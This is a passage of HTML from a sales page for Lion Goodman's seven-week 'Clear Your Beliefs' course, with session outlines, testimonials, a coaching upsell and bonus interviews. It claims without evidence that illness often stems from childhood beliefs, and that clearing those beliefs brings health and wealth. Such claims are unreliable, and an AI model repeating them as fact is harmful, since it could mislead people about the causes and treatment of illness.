and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in 